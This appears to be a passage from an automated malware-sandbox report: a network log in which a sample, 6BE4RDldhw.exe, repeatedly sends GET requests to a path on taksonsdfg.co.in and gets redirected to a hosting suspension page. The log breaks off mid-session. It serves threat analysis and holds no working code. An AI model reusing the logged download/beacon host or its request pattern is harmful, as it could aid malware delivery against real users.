                                2024-11-26 07:12:35 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:12:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.749780108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:37 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:37 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:12:37 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:37 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                13192.168.2.749786108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:39 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:39 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:12:39 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:39 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:12:39 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:12:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                14192.168.2.749793108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:41 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:41 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:12:41 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:41 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                15192.168.2.749799108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:43 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:43 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:12:43 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:43 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:12:43 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:12:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                16192.168.2.749806108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:45 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:46 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:12:46 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:46 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                17192.168.2.749812108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:47 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:48 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:12:48 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:48 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:12:48 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:12:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                18192.168.2.749819108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:50 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:50 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:12:50 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:50 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                19192.168.2.749825108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:52 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:52 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:12:52 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:52 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:12:52 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:12:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                20192.168.2.749832108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:54 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:55 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:12:55 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:55 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                21192.168.2.749838108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:56 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:57 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:12:57 GMT
                                server: LiteSpeed
